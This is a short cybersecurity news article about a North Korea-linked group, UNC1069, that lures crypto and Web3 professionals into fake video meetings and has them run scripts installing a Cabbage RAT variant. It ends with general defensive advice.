A sophisticated hacking campaign linked to North Korea has emerged, targeting professionals in the cryptocurrency and Web3 sectors. The group, identified as UNC1069, lures victims into fake online meetings, ultimately infecting their systems with malware aimed at stealing digital assets.
Deceptive Tactics to Gain Trust
UNC1069 masquerades as venture capital firms seeking investment opportunities, skillfully building rapport with targets. They launch attacks by leveraging counterfeit video conferencing platforms. The operation is financially driven, with proceeds potentially funding North Korea’s missile and nuclear agendas.
The group’s initial contact often occurs through platforms like LinkedIn and Telegram, where they use compromised accounts to appear credible. Meetings are set up using Calendly links, which lead victims to convincing imitations of popular video conferencing services such as Zoom, Google Meet, and Microsoft Teams. In certain instances, deepfake technology is employed to further deceive participants.
Technical Intrusion and Malware Deployment
Upon joining these fake meetings, victims are manipulated into believing their audio or video settings are malfunctioning. The attackers create urgency, prompting them to execute a script that introduces malware into their systems. This malware, identified as an evolved form of Cabbage RAT, is tailored to the victim’s OS, whether Windows, macOS, or Linux.
Research by Validin in April 2026 exposed the intricate infrastructure supporting these attacks, linking UNC1069 to the Axios NPM package compromise and other known threat clusters. The malware’s capabilities include recording real-time audio and video, which is then used in subsequent attacks.
Implications and Security Recommendations
The impact extends beyond system compromise, as attackers exploit captured media for future social engineering efforts. On Windows systems, the infection process involves deceptive prompts that execute PowerShell scripts, altering system defenses and establishing persistence.
Security experts advise organizations in the crypto and Web3 space to verify meeting requests through secure channels and remain vigilant for unusual script activity. Monitoring for anomalous connections and unexpected system changes is crucial in mitigating these threats.
For ongoing updates and expert insights, follow us on Google News, LinkedIn, and X, and set CSN as your preferred news source on Google.
